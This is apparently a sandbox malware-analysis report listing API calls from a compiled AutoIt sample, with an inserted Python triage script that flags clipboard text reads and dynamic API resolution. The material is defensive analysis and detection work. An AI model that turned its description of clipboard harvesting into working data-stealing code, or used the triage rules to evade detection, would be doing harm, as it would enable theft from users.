                                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                        APIs
                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                        • String ID:
                                                                        • API String ID: 15083398-0
                                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
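The call sequence listed above for the function at 0046DCE7 (OpenClipboard, IsClipboardFormatAvailable and GetClipboardData with 0000000D and 00000001, which are CF_UNICODETEXT and CF_TEXT, then GlobalLock on the returned handle) is what a clipboard text grab looks like in this kind of listing. The Python below is an editor's example, not part of the Joe Sandbox report or its IDA plugin: it parses call lines in the report's own bullet format and applies two triage rules, one that recognises the clipboard text read from the format constants, and one that distinguishes attacker-style run-time import resolution from the MSVC CRT's own startup lookup of FlsAlloc/FlsGetValue/FlsSetValue/FlsFree (the function at 00417C28 further down this page, which sits next to __mtterm and is CRT code, not unpacking logic). The sample input is constructed from lines on this page; the rule names, the "APIs"-header splitting and the labels are the editor's own choices.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: API lines copied from this report's per-function
# listings (the clipboard reader around 0046DCE7 and the CRT startup helper
# around 00417C28), each under its own "APIs" header as the report prints them.
SAMPLE_LISTING = """\
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• __mtterm.LIBCMT ref: 00417C34
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
• GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE, optional "(args)", optional comma, then "ref: <call-site address>".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Clipboard format constants from winuser.h.
CF_TEXT = 1
CF_UNICODETEXT = 13
# Routines the MSVC CRT resolves via GetProcAddress at startup (XP compatibility).
CRT_FLS_IMPORTS = {"FlsAlloc", "FlsGetValue", "FlsSetValue", "FlsFree"}


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple              # argument strings as printed, e.g. "0000000D", "?"
    ref: int                 # call-site address
    subcall: Optional[int]   # set when the line is a "Part of subcall function" entry

    def int_args(self) -> list:
        # Only 8-hex-digit literals are resolvable; "?" and symbol names are unknown.
        return [int(a, 16) for a in self.args if re.fullmatch(r"[0-9A-F]{8}", a)]


def parse_listing(text: str) -> list:
    """Split the report text at each 'APIs' header and parse the bullet lines."""
    functions = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            functions.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not functions:
            continue  # headers such as "Strings" or "Memory Dump Source"
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        functions[-1].append(Call(m["api"], m["mod"], args, int(m["ref"], 16),
                                  int(m["sub"], 16) if m["sub"] else None))
    return functions


def classify(calls: list) -> list:
    """Return behaviour labels for one function's direct calls (subcalls excluded)."""
    direct = [c for c in calls if c.subcall is None]
    names = {c.api for c in direct}
    labels = []
    # Clipboard read: the function opens the clipboard and pulls a text format out.
    text_reads = [c for c in direct if c.api == "GetClipboardData"
                  and any(f in (CF_TEXT, CF_UNICODETEXT) for f in c.int_args())]
    if "OpenClipboard" in names and text_reads:
        labels.append("clipboard-text-read")
    # Run-time import resolution: flag GetProcAddress unless every target is one of
    # the Fls* routines the CRT resolves itself, which is noise for triage.
    targets = {c.args[1] for c in direct if c.api == "GetProcAddress" and len(c.args) > 1}
    if targets and targets <= CRT_FLS_IMPORTS:
        labels.append("crt-startup-fls-resolution")
    elif targets:
        labels.append("dynamic-api-resolution")
    return labels


def triage(text: str) -> dict:
    """Map each function (keyed by its first call-site address) to its labels."""
    return {f"{fn[0].ref:08X}": classify(fn) for fn in parse_listing(text) if fn}


if __name__ == "__main__":
    for site, labels in triage(SAMPLE_LISTING).items():
        print(site, ", ".join(labels) or "no rule matched")
```

Keying by the first call-site address is a convenience because the listing does not print the function start; on a real report the key should be the function name the report prints above each block. The CRT allowlist is deliberately exact: a function that resolves the four Fls* names plus anything else still gets the dynamic-api-resolution label.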
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                        • String ID: @$AutoIt v3 GUI
                                                                        • API String ID: 867697134-3359773793
                                                                        • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                        • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 1503153545-1459072770
                                                                        • Opcode ID: f2d6726f73004f3d285f80ba49d5ebad33d8f67e86e3dcf49ca09fff6bccecde
                                                                        • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                        • Opcode Fuzzy Hash: f2d6726f73004f3d285f80ba49d5ebad33d8f67e86e3dcf49ca09fff6bccecde
                                                                        • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$__wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                        • API String ID: 790654849-32604322
                                                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                                                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                        • Opcode Fuzzy Hash: f3c6a33133e0ceaaf1d30a9e9da3e996417f0e16fc69e58501023729b1035f0c
                                                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                        APIs
                                                                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                        • _fseek.LIBCMT ref: 00452B3B
                                                                        • __wsplitpath.LIBCMT ref: 00452B9B
                                                                        • _wcscpy.LIBCMT ref: 00452BB0
                                                                        • _wcscat.LIBCMT ref: 00452BC5
                                                                        • __wsplitpath.LIBCMT ref: 00452BEF
                                                                        • _wcscat.LIBCMT ref: 00452C07
                                                                        • _wcscat.LIBCMT ref: 00452C1C
                                                                        • __fread_nolock.LIBCMT ref: 00452C53
                                                                        • __fread_nolock.LIBCMT ref: 00452C64
                                                                        • __fread_nolock.LIBCMT ref: 00452C83
                                                                        • __fread_nolock.LIBCMT ref: 00452C94
                                                                        • __fread_nolock.LIBCMT ref: 00452CB5
                                                                        • __fread_nolock.LIBCMT ref: 00452CC6
                                                                        • __fread_nolock.LIBCMT ref: 00452CD7
                                                                        • __fread_nolock.LIBCMT ref: 00452CE8
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                        • __fread_nolock.LIBCMT ref: 00452D78
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                        • String ID:
                                                                        • API String ID: 2054058615-0
                                                                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window
                                                                        • String ID: 0
                                                                        • API String ID: 2353593579-4108050209
                                                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                        APIs
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                        • String ID:
                                                                        • API String ID: 1744303182-0
                                                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                        • __mtterm.LIBCMT ref: 00417C34
                                                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                        • __init_pointers.LIBCMT ref: 00417CE6
                                                                        • __calloc_crt.LIBCMT ref: 00417D54
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                        • API String ID: 4163708885-3819984048
                                                                        • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                        • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                        • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                        • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                        • API String ID: 0-1896584978
                                                                        • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                        • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                        • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                        • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$IconLoad
